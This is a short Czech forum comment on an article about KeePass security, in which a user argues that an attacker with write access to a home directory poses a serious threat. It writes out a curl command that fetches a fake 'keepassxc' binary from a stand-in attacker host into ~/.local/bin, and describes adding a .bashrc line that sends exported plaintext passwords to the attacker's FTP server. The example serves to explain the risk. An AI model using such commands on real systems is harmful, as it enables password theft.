Názor k článku Postřehy z bezpečnosti: nedobrovolný open-source nebo zaplacení výkupného od k3dAR - @K> je vhodne si uvedomit, ze tve "binarky kterou...

  • Článek je starý, nové názory již nelze přidávat.
  • 7. 2. 2023 2:37

    k3dAR
    Stříbrný podporovatel

    @K>

    je vhodne si uvedomit, ze tve "binarky kterou smi upravovat jen root, takze to je nejaka obtiz navic" pro pripadneho utocnika co ma zapis "jen" do tveho home, znamena takovouto "obtiz":

    curl https://utocnik.web/getpassxc --create-dirs -o ~/.local/bin/ke­epassxc

    ale samozrejme ze s keepass to ma jednodusi, ze nemusi vytvaret/hledat zakernou modifikaci, protoze mu staci zmenit conf a vyexportuje se do plaintextu, takze si jen do .bashrc prida poslani souboru na sve ftp :)
    takze bych nad tim oci nezaviral, zaroven ale je nezaviral obecne nad tim ze utocnik s zapisem do $HOME je problem uz sam o sobe...